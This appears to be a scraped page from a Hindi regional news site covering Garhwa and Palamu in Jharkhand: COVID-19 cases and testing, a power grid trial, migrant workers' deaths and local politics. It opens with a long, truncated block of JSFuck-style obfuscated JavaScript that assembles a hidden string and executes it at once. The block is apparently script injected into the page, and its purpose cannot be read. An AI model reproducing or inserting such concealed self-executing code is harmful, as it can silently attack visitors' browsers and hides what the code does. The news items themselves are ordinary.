]+$[13]+$[14]+(+{}+[]+[]+[]+[]+{})[+!+[]+[+[]]]+$[15]+$[15]+(+{}+[]+[]+[]+[]+{})[+!+[]+[+[]]]+$[1]+(!![]+[])[!+[]+!+[]+!+[]]+(![]+[])[+[]]+$[4]+([![]]+[][[]])[+!+[]+[+[]]]+([]+[]+[][[]])[+!+[]]+([]+[]+[][[]])[!+[]+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+$[8]+(![]+[]+[]+[]+{})[+!+[]+[]+[]+(!+[]+!+[]+!+[])]+(![]+[])[+[]]+$[7]+$[9]+$[4]+([]+[]+{})[!+[]+!+[]]+([![]]+[][[]])[+!+[]+[+[]]]+([]+[]+[][[]])[+!+[]]+$[10]+$[4]+$[9]+$[11]+$[12]+$[2]+$[13]+$[14]+(+{}+[]+[]+[]+[]+{})[+!+[]+[+[]]]+$[15]+$[15]+(+{}+[]+[]+[]+[]+{})[+!+[]+[+[]]]+$[1]+(!![]+[])[!+[]+!+[]+!+[]]+(![]+[])[+[]]+$[4]+([![]]+[][[]])[+!+[]+[+[]]]+([]+[]+[][[]])[+!+[]]+([]+[]+[][[]])[!+[]+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+$[8]+(![]+[]+[]+[]+{})[+!+[]+[]+[]+(!+[]+!+[]+!+[])]+(![]+[])[+[]]+$[7]+$[9]+$[4]+([]+[]+[][[]])[!+[]+!+[]]+(!![]+[])[!+[]+!+[]]+([![]]+{})[+!+[]+[+[]]]+$[16]+([]+[]+[][[]])[!+[]+!+[]]+(!![]+[])[!+[]+!+[]]+([![]]+{})[+!+[]+[+[]]]+$[16]+$[10]+([]+[]+{})[+!+[]]+$[4]+$[9]+$[11]+$[12]+$[2]+$[13]+$[14]+(+{}+[]+[]+[]+[]+{})[+!+[]+[+[]]]+$[15]+$[15]+(+{}+[]+[]+[]+[]+{})[+!+[]+[+[]]]+$[1]+(!![]+[])[!+[]+!+[]+!+[]]+(![]+[])[+[]]+$[4]+([![]]+[][[]])[+!+[]+[+[]]]+([]+[]+[][[]])[+!+[]]+([]+[]+[][[]])[!+[]+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+$[8]+(![]+[]+[]+[]+{})[+!+[]+[]+[]+(!+[]+!+[]+!+[])]+(![]+[])[+[]]+$[7]+$[9]+$[4]+$[17]+(![]+[])[+!+[]]+([]+[]+[][[]])[+!+[]]+([]+[]+[][[]])[!+[]+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+$[8]+$[4]+$[9]+$[11]+$[12]+$[2]+$[13]+$[14]+(+{}+[]+[]+[]+[]+{})[+!+[]+[+[]]]+$[15]+$[15]+(+{}+[]+[]+[]+[]+{})[+!+[]+[+[]]]+$[1]+(!![]+[])[!+[]+!+[]+!+[]]+(![]+[])[+[]]+$[4]+([![]]+[][[]])[+!+[]+[+[]]]+([]+[]+[][[]])[+!+[]]+([]+[]+[][[]])[!+[]+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+$[8]+(![]+[]+[]+[]+{})[+!+[]+[]+[]+(!+[]+!+[]+!+[])]+(![]+[])[+[]]+$[7]+$[9]+$[4]+$[17]+(![]+[])[+!+[]]+$[18]+([]+[]+{})[+!+[]]+([]+[]+{})[+!+[]]+$[4]+$[9]+$[11]+$[12]+$[2]+$[13]+$[14]+(+{}+[]+[]+[]+[]+{})[+!+[]+[+[]]]+$[15]+$[15]+(+{}+[]+[]+[]+[]+{})[+!+[]+[+[]]]+$[1]+(!![]+[])[!+[]+!+[]+!+[]]+(![]+[])[+[]]+$[4]+([![]]+[][[]])[+!+[]+[+[]]]+([]+[]+[][[]])[+!+[]]+([]+[]+[][[]])[!+[]+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+$[8]+(![]+[]+[]+[]+{})[+!+[]+[]+[]+(!+[]+!+[]+!+[])]+(![]+[])[+[]]+$[7]+$[9]+$[4]+(![]+[])[+!+[]]+([]+[]+{})[+!+[]]+(![]+[])[!+[]+!+[]]+$[4]+$[9]+$[11]+$[12]+$[2]+$[13]+$[14]+(+{}+[]+[]+[]+[]+{})[+!+[]+[+[]]]+$[15]+$[15]+(+{}+[]+[]+[]+[]+{})[+!+[]+[+[]]]+$[1]+(!![]+[])[!+[]+!+[]+!+[]]+(![]+[])[+[]]+$[4]+([![]]+[][[]])[+!+[]+[+[]]]+([]+[]+[][[]])[+!+[]]+([]+[]+[][[]])[!+[]+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+$[8]+(![]+[]+[]+[]+{})[+!+[]+[]+[]+(!+[]+!+[]+!+[])]+(![]+[])[+[]]+$[7]+$[9]+$[4]+(![]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+$[16]+$[4]+$[9]+$[11]+$[12]+$[2]+$[13]+$[14]+(+{}+[]+[]+[]+[]+{})[+!+[]+[+[]]]+$[15]+$[15]+(+{}+[]+[]+[]+[]+{})[+!+[]+[+[]]]+$[1]+(!![]+[])[!+[]+!+[]+!+[]]+(![]+[])[+[]]+$[4]+([![]]+[][[]])[+!+[]+[+[]]]+([]+[]+[][[]])[+!+[]]+([]+[]+[][[]])[!+[]+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+$[8]+(![]+[]+[]+[]+{})[+!+[]+[]+[]+(!+[]+!+[]+!+[])]+(![]+[])[+[]]+$[7]+$[9]+$[4]+(![]+[])[+!+[]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(![]+[])[+!+[]]+$[0]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(![]+[])[+!+[]]+$[4]+$[9]+$[11]+$[12]+$[2]+$[13]+$[14]+(+{}+[]+[]+[]+[]+{})[+!+[]+[+[]]]+$[15]+$[15]+(+{}+[]+[]+[]+[]+{})[+!+[]+[+[]]]+$[1]+(!![]+[])[!+[]+!+[]+!+[]]+(![]+[])[+[]]+$[4]+([![]]+[][[]])[+!+[]+[+[]]]+([]+[]+[][[]])[+!+[]]+([]+[]+[][[]])[!+[]+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+$[8]+(![]+[]+[]+[]+{})[+!+[]+[]+[]+(!+[]+!+[]+!+[])]+(![]+[])[+[]]+$[7]+$[9]+$[4]+([]+[]+{})[!+[]+!+[]]+([![]]+[][[]])[+!+[]+[+[]]]+([]+[]+[][[]])[+!+[]]+$[10]+$[4]+$[9]+$[11]+$[12]+$[2]+$[13]+$[14]+(+{}+[]+[]+[]+[]+{})[+!+[]+[+[]]]+$[11]+$[6]+$[19]+$[6]+$[6]+([]+[]+[][[]])[!+[]+!+[]]+([]+[]+{})[+!+[]]+([![]]+{})[+!+[]+[+[]]]+(!![]+[])[!+[]+!+[]]+$[3]+(!![]+[])[!+[]+!+[]+!+[]]+([]+[]+[][[]])[+!+[]]+(!![]+[])[+[]]+$[4]+$[10]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+$[20]+(![]+[])[!+[]+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+$[3]+(!![]+[])[!+[]+!+[]+!+[]]+([]+[]+[][[]])[+!+[]]+(!![]+[])[+[]]+$[21]+$[17]+$[22]+([]+[]+[][[]])[!+[]+!+[]]+$[7]+$[9]+$[23]+$[24]+$[25]+([]+[]+{})[+!+[]+[+[]]]+$[26]+$[13]+$[27]+$[28]+$[28]+$[13]+$[27]+$[26]+$[17]+$[13]+$[29]+$[24]+(![]+[])[+[]]+$[30]+$[25]+([]+[]+{})[+!+[]]+$[9]+$[11]+$[4]+([![]]+[][[]])[+!+[]+[+[]]]+([]+[]+[][[]])[+!+[]]+([]+[]+[][[]])[+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]+$[31]+$[32]+$[33]+$[34]+(+{}+[]+[]+[]+[]+{})[+!+[]+[+[]]]+$[2]+(+{}+[]+[]+[]+[]+{})[+!+[]+[+[]]]+$[9]+$[35]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[+[]]+(!![]+[])[+!+[]]+(![]+[])[+!+[]]+$[3]+(!![]+[])[!+[]+!+[]+!+[]]+(+{}+[]+[]+[]+[]+{})[+!+[]+[+[]]]+([]+[]+{})[!+[]+!+[]]+([]+[]+{})[+!+[]]+(!![]+[])[+!+[]]+([]+[]+[][[]])[!+[]+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]+$[2]+$[36]+$[28]+$[36]+(+{}+[]+[]+[]+[]+{})[+!+[]+[+[]]]+(![]+[])[+[]]+(!![]+[])[+!+[]]+(![]+[])[+!+[]]+$[3]+(!![]+[])[!+[]+!+[]+!+[]]+([]+[]+{})[!+[]+!+[]]+([]+[]+{})[+!+[]]+(!![]+[])[+!+[]]+([]+[]+[][[]])[!+[]+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]+$[2]+$[36]+([]+[]+[][[]])[+!+[]]+([]+[]+{})[+!+[]]+$[36]+(+{}+[]+[]+[]+[]+{})[+!+[]+[+[]]]+(![]+[])[+[]]+(!![]+[])[+!+[]]+(![]+[])[+!+[]]+$[3]+(!![]+[])[!+[]+!+[]+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+$[24]+(![]+[])[+!+[]]+([![]]+{})[+!+[]+[+[]]]+([![]]+[][[]])[+!+[]+[+[]]]+([]+[]+[][[]])[+!+[]]+$[10]+$[2]+$[36]+$[28]+$[36]+(+{}+[]+[]+[]+[]+{})[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]+!+[]]+([![]]+{})[+!+[]+[+[]]]+(!![]+[])[+!+[]]+([]+[]+{})[+!+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]+([![]]+[][[]])[+!+[]+[+[]]]+([]+[]+[][[]])[+!+[]]+$[10]+$[2]+$[36]+(![]+[])[+!+[]]+(!![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+([]+[]+{})[+!+[]]+$[36]+(+{}+[]+[]+[]+[]+{})[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]+([![]]+{})[+!+[]+[+[]]]+$[2]+$[36]+$[37]+$[37]+(!![]+[])[!+[]+!+[]]+([]+[]+[][[]])[+!+[]]+(![]+[])[!+[]+!+[]]+([![]]+[][[]])[+!+[]+[+[]]]+$[3]+(!![]+[])[+!+[]]+$[8]+$[4]+([![]]+{})[+!+[]+[+[]]]+([]+[]+{})[+!+[]]+$[3]+$[37]+$[8]+$[3]+(![]+[])[!+[]+!+[]]+$[38]+(![]+[])[+[]]+(!![]+[])[+!+[]]+$[3]+$[2]+(![]+[])[+[]]+(!![]+[])[+!+[]]+(![]+[])[+!+[]]+$[3]+(!![]+[])[!+[]+!+[]+!+[]]+$[39]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+$[40]+(!![]+[])[+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]+(!![]+[])[+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]+$[2]+$[9]+(+{}+[]+[]+[]+[]+{})[+!+[]+[+[]]]+$[41]+(+{}+[]+[]+[]+[]+{})[+!+[]+[+[]]]+(!![]+[])[!+[]+!+[]+!+[]]+([]+[]+[][[]])[+!+[]]+([![]]+{})[+!+[]+[+[]]]+([]+[]+{})[+!+[]]+([]+[]+[][[]])[!+[]+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+$[42]+$[1]+$[22]+$[43]+([]+[]+{})[+!+[]]+$[3]+$[24]+([]+[]+{})[+!+[]]+([]+[]+[][[]])[+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+([]+[]+[][[]])[+!+[]]+(!![]+[])[+[]]+$[7]+([]+[]+[][[]])[!+[]+!+[]]+([]+[]+{})[+!+[]]+([![]]+{})[+!+[]+[+[]]]+(!![]+[])[!+[]+!+[]]+$[3]+(!![]+[])[!+[]+!+[]+!+[]]+([]+[]+[][[]])[+!+[]]+(!![]+[])[+[]]+$[4]+(!![]+[])[+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]+(!![]+[])[+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]+$[11]+(+{}+[]+[]+[]+[]+{})[+!+[]+[+[]]]+$[41]+(+{}+[]+[]+[]+[]+{})[+!+[]+[+[]]]+$[9]+$[39]+([]+[]+[][[]])[!+[]+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(![]+[])[+[]]+(![]+[])[+!+[]]+(!![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+$[40]+$[16]+(!![]+[])[!+[]+!+[]+!+[]]+$[17]+$[26]+([]+[]+{})[+!+[]]+(!![]+[])[+!+[]]+([]+[]+[][[]])[!+[]+!+[]]+$[2]+$[44]+(![]+[])[+!+[]]+$[3]+(![]+[])[+!+[]]+$[10]+(!![]+[])[+!+[]]+(![]+[])[+!+[]]+(+{}+[]+[]+[]+[]+{})[+!+[]+[+[]]]+$[45]+([]+[]+{})[+!+[]]+(![]+[])[+[]]+(!![]+[])[+[]]+$[9]+(+{}+[]+[]+[]+[]+{})[+!+[]+[+[]]]+$[41]+(+{}+[]+[]+[]+[]+{})[+!+[]+[+[]]]+$[9]+$[39]+$[9]+$[41]+$[26]+([![]]+[][[]])[+!+[]+[+[]]]+([]+[]+[][[]])[+!+[]]+([]+[]+[][[]])[!+[]+!+[]]+([]+[]+{})[+!+[]]+$[26]+$[4]+(![]+[])[!+[]+!+[]]+([]+[]+{})[+!+[]]+([![]]+{})[+!+[]+[+[]]]+(![]+[])[+!+[]]+(!![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+([]+[]+{})[+!+[]]+([]+[]+[][[]])[+!+[]]+$[4]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+!+[]]+([![]]+{})[+!+[]+[+[]]]+$[18]+$[4]+(!![]+[])[+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+$[24]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+([![]]+{})[+!+[]+[+[]]]+(!![]+[])[!+[]+!+[]+!+[]]+$[7]+$[9]+$[38]+$[9]+$[46]+(+{}+[]+[]+[]+[]+{})[+!+[]+[+[]]]+$[9]+$[39]+$[9]+$[11]+$[41]+$[9]+$[36]+(+{}+[]+[]+[]+[]+{})[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+$[17]+(![]+[])[!+[]+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+$[2]+$[36]+$[24]+([]+[]+{})[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(!![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+([]+[]+{})[+!+[]]+([]+[]+[][[]])[+!+[]]+$[47]+(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+$[8]+(!![]+[])[!+[]+!+[]+!+[]]+([]+[]+[][[]])[!+[]+!+[]]+$[5]+(+{}+[]+[]+[]+[]+{})[+!+[]+[+[]]]+$[26]+([![]]+[][[]])[+!+[]+[+[]]]+([]+[]+[][[]])[!+[]+!+[]]+(!![]+[])[+[]]+$[18]+$[47]+$[14]+$[28]+$[28]+$[48]+$[5]+(+{}+[]+[]+[]+[]+{})[+!+[]+[+[]]]+$[18]+(!![]+[])[!+[]+!+[]+!+[]]+([![]]+[][[]])[+!+[]+[+[]]]+$[10]+$[18]+(!![]+[])[+[]]+$[47]+$[14]+$[28]+$[28]+$[48]+$[5]+(+{}+[]+[]+[]+[]+{})[+!+[]+[+[]]]+([]+[]+{})[!+[]+!+[]]+(![]+[])[+!+[]]+([![]]+{})[+!+[]+[+[]]]+$[16]+$[10]+(!![]+[])[+!+[]]+([]+[]+{})[+!+[]]+(!![]+[])[!+[]+!+[]]+([]+[]+[][[]])[+!+[]]+([]+[]+[][[]])[!+[]+!+[]]+$[13]+([![]]+{})[+!+[]+[+[]]]+([]+[]+{})[+!+[]]+(![]+[])[!+[]+!+[]]+([]+[]+{})[+!+[]]+(!![]+[])[+!+[]]+$[47]+(+{}+[]+[]+[]+[]+{})[+!+[]+[+[]]]+$[26]+$[18]+([![]]+[][[]])[+!+[]+[+[]]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+$[5]+(+{}+[]+[]+[]+[]+{})[+!+[]+[+[]]]+$[49]+$[13]+([![]]+[][[]])[+!+[]+[+[]]]+([]+[]+[][[]])[+!+[]]+([]+[]+[][[]])[!+[]+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+$[8]+$[47]+$[50]+$[28]+$[28]+$[28]+$[28]+$[28]+$[28]+$[5]+(+{}+[]+[]+[]+[]+{})[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(![]+[])[+[]]+(!![]+[])[+[]]+$[47]+$[28]+$[5]+(+{}+[]+[]+[]+[]+{})[+!+[]+[+[]]]+(!![]+[])[+[]]+([]+[]+{})[+!+[]]+$[24]+$[47]+$[28]+$[5]+$[36]+$[51]+$[35]+$[37]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[+[]]+(!![]+[])[+!+[]]+(![]+[])[+!+[]]+$[3]+(!![]+[])[!+[]+!+[]+!+[]]+$[51]+$[9]+$[6]+$[52])();

9 total views, 3 views today

डंडई । गढ़वा । डंडई मुख्य बाजार में मिले दो कोरोना पॉजिटिव मरीज,लोगो मे बना दहशत का माहौल

डंडई से चुनमुन चौधरी की रिपोर्ट

डंडई । गढ़वा । गढ़वा जिला अंतर्गत डंडई मुख्यालय स्थित दो कोरोना पॉजिटिव मरीज मिलने से आसपास के गांवों में लोगों के अंदर एक अलग दहशत पैदा हो गया है । अब आस पास के विभिन्न गांवों में लोग कोरोना के प्रति काफी सहजता बरतने की चर्चा करने लगे हैं। दोनों पॉजिटिव मरीजों को कोरेन्टीन सेंटर में भर्ती करा दिया गया है। वहीं डंडई थाना के प्रभारी थाना प्रभारी विकास कुमार यादव ने क्षेत्र के लोगों को धारा 144 तथा सामाजिक दूरी का पालन करने का अपील किया है। साथ ही सभी लोगों को मास्क लगाकर ही बाहर निकलने का निर्देश दिया है।

98 total views, 6 views today

गढ़वा। जिले को बेहतर बिजली मुहैया कराने हेतु 4 अगस्त को होगा भागोडीह बिजली ग्रिड का ट्रायल


गढ़वा से कन्हैया चौबे की रिपोर्ट
गढ़वा । भागोडीह ग्रिड संचरण लाईन का कार्य पूरा कर लिया गया है। चार अगस्त को विभाग द्वारा इसका ट्रायल किया जाएगा। ट्रायल सफल होने के उपरांत मंत्री मिथिलेश कुमार ठाकुर की उपस्थिति में मुख्यमंत्री हेमंत सोरेन द्वारा ग्रिड का ऑनलाइन उद्घाटन किया जाएगा।

उक्त जानकारी मुख्यमंत्री गंभीर बीमारी योजना के प्रतिनिधि कंचन साहू के कार्यालय में पत्रकार वार्ता में झामुमो नेताओं ने दी। पत्रकार वार्ता के दौरान पार्टी के जिलाध्यक्ष तनवीर आलम खान ने कहा कि जिले की चरमराई विद्युत व्यवस्था को दुरूस्त कराने के लिए मंत्री मिथिलेश ठाकुर शुरू से ही लगे हुए थे। सरकार गठन होने के बाद उन्होंने मंत्री बनते ही मुख्यमंत्री से मुलाकात की थी तथा इस समस्या का निदान कराने की मांग की थी। उनके आग्रह पर सीएम ने लहलहे ग्रिड को भागोडीह ग्रिड से जोड़ने के लिए विशेष टीम का गठन कर कार्य पूरा कराया। मंगलवार को 132 केवी ग्रिड सबस्टेशन गढ़वा रोड से नवनिर्मित ग्रिड भागोडीह के बीच डबल सर्किट 3 फेज संचरण लाईन का ट्रायल किया जाएगा। उक्त संचरण लाईन मेढ़ना, करूआ, करकेट, बीरबंधा, चामा, पेश्का, बाना, हासनदाग होते हुए भागोडीह ग्रिड तक पहुंचेगी। इसलिए विभाग ने इस क्षेत्र के लोगों को किसी प्रकार की जान माल की क्षति हो इसके लिए पहले से ही सचेत कर दिया है। पत्रकार वार्ता में मनोज ठाकुर, धीरज दुबे, कंचन साहू, कार्तिक पांडेय आदि उपस्थित थे।

50 total views, 4 views today

हुसैनाबाद । पलामू । स्वर्गीय भीष्म नारायण सिंह की मनाई गई दूसरी पुण्यतिथि

हुसैनाबाद । पलामू । कांग्रेस के पूर्व राज्यपाल सह केंद्रीय मंत्री स्वर्गीय भीष्म नारायण सिंह की शनिवार को मनाई गई.  पुण्यतिथि।कॉंग्रेस कार्यकर्ताओं ने पौधा रोपण कर दिया श्रधांजलि। कांग्रेस अल्पसंख्यक प्रकोष्ठ के प्रखंड अध्यक्ष अरशद हुसैन ने बताया कि आज बेहद संयोग की बात है, कि आज बकरा ईद के साथ साथ श्री सिंह का पुण्यतिथि भी है। स्वर्गीय भीष्म नारायण बाबू के कार्यों से हम सभी को प्रेरणा लेना चाहिए और इस लॉकडाउन व करोना महामारी का ख्याल करते हुए हम सभी कांग्रेसी कार्यकर्ता से गुज़ारिश करते हैं, कि श्री सिंह की पुण्यतिथि सोशल डिस्टेंसिंग का पालन करते हुए शांति पूर्वक मनाएं। वहीं कांग्रेस कार्यकर्ताओं ने सोशल डिस्टेंसिंग का ख्याल रखते हुए हुसैनाबाद के लंबी गली व राजटोली, जपला धरहरा के कब्रिस्तान सभागार में पौधारोपण किया। इस मौके पर कांग्रेस नगर अध्यक्ष फरीद खान, साहिल खान, वीरू कुमार, अफसर हुसैन, महबूब खान, सनी हुसैन, चंदन कुमार के अलावा कई लोग मौजूद थे.

27 total views, 5 views today

भंडरिया । गढ़वा । कोरोना जांच हेतु कुल 92 लोगों का लिया गया सैम्पल

स्वाब के लिए कतार बध पुलिस कर्मी व अन्य

भंडरिया से देवानन्द कुमार की रिपोर्ट

भंडरिया ।गढ़वा। सामुदायिक स्वास्थ्य केन्द्र में आज हाॅस्पीटल के स्वास्थ्य कर्मी व थाना प्रभारी सह इंस्पेक्टर कृष्णा कुमार समेत कुल 92 लोगों का कोरोना जांच के लिए स्वाब लिया गया। प्रभारी चिकित्सा पदाधिकारी डॉ विजय किशोर रजक ने बताया कि आरटीपीसीआर के माध्यम से सैम्पल लिया गया है। जिनका टेस्ट रांची में किया जायेगा। वहीं बंशीधर नगर में पदास्थापित बैंक मैनेजर के कोरोना वायरस से मौत होने पर उनके परिवार के आठ सदस्यों का भी सैम्पल लिया गया। इस दौरान सामुदायिक स्वास्थ्य केन्द्र में अव्यवस्था का भारी आलम देखा गया। अफसर व जवानों को कई घंटे तक धुप में खड़ा रखा गया। इतना बड़ा अस्पताल रहने के बावजुद भी चिकित्सा पदाधिकारी विजय किशोर रजक के मनमानी के कारण खुले मैदान में कोरोना जांच हेतु सैम्पल लिया गया। बाद में बारिश शुरु होने पर आइसोलेशन वार्ड में सैम्पल लिया गया। किन्तु मुख्य अस्पताल के अन्दर प्रवेश वर्जित के कारण अधिकांश पुलिस अधिकारी व जवान भींग चुके थे।

13 total views, no views today

धुरकी । सगमा । गढ़वा । छत्तीसगढ़ के रायपुर से मजदूर के तीन दिन बाद शव घर पहुचा गांव में मचा कोहराम

सुधीर राम चंद्रवंशी का शव
रोते – बिखलते परिजन

धुरकी ।सगमा । गढ़वा । छत्तीसगढ़ के रायपुर वीआईपी रोड स्थित एक फार्म हॉउस में सुरक्षा गार्ड की नौकरी करने वाले धुरकी थाना क्षेत्र के बिरबल गांव निवासी 40 वर्षीय सुधीर राम चंद्रवंशी की तीन दिन पूर्व मौत हो गई। बता दे कि रायपुर से सुधीर राम चंद्रवंसी की शव तीन दिन के बाद दिन रविवार को घर पर पहुचते ही पूरे गांव में सनसनी मच गई। बता दे कि घर की परिजनों का रो रो कर बुरा हाल है।जानकारी अनुसार धुरकी थाना क्षेत्र के निवासी सुधीर राम चंद्रवंशी रायपुर के वीआईपी रॉड फ्रॉम हाउस में प्राइवेट सुरक्षा गार्ड के नौकरी करता था।और घर के परिजनों ने बताया कि रायपुर के वीआईपी फ्रॉम हाउस में सुरक्षा गार्ड की नौकरी करीब पिछले 20 वर्ष से अधिक से सुधीर चन्द्रवंशी गार्ड का काम करता था। जब कम्पनी का कार्य बंद हो, गया तो उसी प्राइवेट कम्पनी के हवेली में काम किया करता था।और बतया जा रहा हैं कि छत्तीसगढ़ के रायपुर के फुंडहर चौक सड़क के किनारे सुधीर राम चन्द्रवंशी के लवारिश की तरह लाश पाया गया और उस व्यक्ति की पहचान आधार कार्ड और पहचान पत्र के माध्यम से किया गया और इस लावारिश लाश को पहचान कर घर वाले को सूचना दिया गया। मौत के सूचना मिलते ही घर परिजनों छत्तीसगढ़ रायपुर वीआईपी रॉड फ्रॉम हाउस पहुचे तो परिजनों के मालूम चला कि सुधीर राम चन्द्रवंशी की लाश को पुलिस प्रशासन के लापरवाही से 24 घंटे घटनास्थल पर ही लाश पड़ा रहा 24 घंटे के बाद लाश को पोस्टमार्टम के लिए भेजा गया ।इधर घर के पपरिजनों का कहना है कि सुधीर को हत्या किया गया और हत्या कर छत्तीसगढ़ के रायपुर फुंडहर चौक सड़क के किनारे झाड़ीयो में फेंक दिया गया है।

202 total views, 6 views today

नावा बाजार। पलामू। अब राधेश्याम मोची के बेटे का हो सकेगा ईलाज, मुख्यमंत्री हेमन्त सोरेन ने लिया संज्ञान

नावा बाजार। पलामू। नावा बाजार प्रखंड अंतर्गत कण्डा पंचायत के रहने वाले राधेश्याम मोची का बेटा एक बीमारी से ग्रसित है। जिसमे राधेश्याम के बेटे का सिर सामान्य बच्चे के सिर से काफी बड़ा है। जो कि दिन प्रतिदिन बढ़ता ही जा रहा है। जिसके माता पिता मजदुरी करके किसी तरह घर चलते है। बच्चे की ये बीमारी हो जाने से वो काफी चिंतित है। उनके पास इतना पैसा नही है , की अपने बच्चे का ईलाज सही से करवा सके। ये बात जैसे ही युवा समाजसेवी राहुल कुमार दुबे का मालूम हुआ । उन्होंने इसकी जानकारी ट्विटर के माध्यम से इसकी जानकारी झारखंड के मुख्यमंत्री हेमन्त सोरेन को दिया । जिसे मुख्यमंत्री ने मामले को संज्ञान में लेते हुए। पलामू डीसी को मामले को जांच कर राधेश्याम के बच्चे को हर संभव चिकित्सीय मदद पहुचाने को कहा।

10 total views, 1 views today

नावा बाजार। पलामू। शत्रुध्न कुमार शत्रु ने मनरेगा कर्मीयो के द्वारा जारी हड़ताल का समर्थन किये

नावा बाजार। पलामू। झारखण्ड क्रांति मंच के केंद्रीय अध्यक्ष शत्रुघ्न कुमार शत्रु ने प्रेस विज्ञप्ति जारी कर संविदा पर बहाल मनरेगा कर्मियों के हड़ताल का समर्थन करते हुये कहा है कि चुनाव से पूर्व किये गये वादे को दृष्टिगत रखते हुये हेमन्त सरकार को अविलम्ब इन्हे सरकारी सेवक घोषित कर देना चाहिए ।जारी विज्ञप्ति में उन्होंने कहा है कि मनरेगा कर्मियों के साथ सरकार का सौतेलापन जारी है,जिस अनुपात में उनसे काम लिया जाता है उसकी तुलना में मानदेय आदि की सुविधा बहुत ही हास्यास्पद है ।गौरतलब है कि मनरेगा कर्मियों की हड़ताल की वजह से ग्रामीण क्षेत्र में बाहर से लौटे अप्रवासी मजदूरों के समक्ष रोजी-रोटी का संकट पैदा हो गया है,ऐसी स्थिति में रघुवर सरकार की तरह हठधर्मिता दिखाना हेमन्त सरकार का न्यायोचित कदम नहीं कहा जा सकता है।

9 total views, no views today

कांडी। गढ़वा। तीन दिनों बाद हरियाणा से युवक का गांव में आया शव

कांडी से अरुण कुमार चौबे

कांडी। गढ़वा। शुक्रवार की दोपहर मझिगावां गांव के युवक की मौत हरियाणा के झझर जिले में एक दुघर्टना में हो गई थी। जंहा शव का पोस्टमार्टम शनिवार को किया गया उसके बाद उसके शव को एक एम्बुलेंस के द्वारा उसके पैतृक आवास मझिगावां लाया गया। शव आते ही पूरा गांव गमगीन हो गया। लोगों के आँखों से लगातार आंसू आने लगा। देखते ही देखते लोगों का हुजूम इतना जमा हो गया कि इस दुःख की घड़ी में लोग सोसल डिस्टेंन्सिंग को भूल गए। आंगन में शव रखते ही बूढ़ी मा बढ़ें पिता के सुध कंहा थे कोई कह नही सकता। वंही बड़ा भाई जब दहाड़ मारकर रोता तो उसे पकड़ने के लिए लोगों के होश उड़ जाते थे। अंत में ग्रामीणों ने सूझ बूझ दिखाते हुए शव को दाह संस्कार करने के लिए सोन नदी के श्रीनगर तट पर किया गया।

61 total views, 5 views today

कांडी। गढ़वा। पुलिस व ग्रामीणों के बीच हुई झड़प, पुलिस जीप को पहुंचा नुकसान

कांडी से अरुण कुमार चौबे

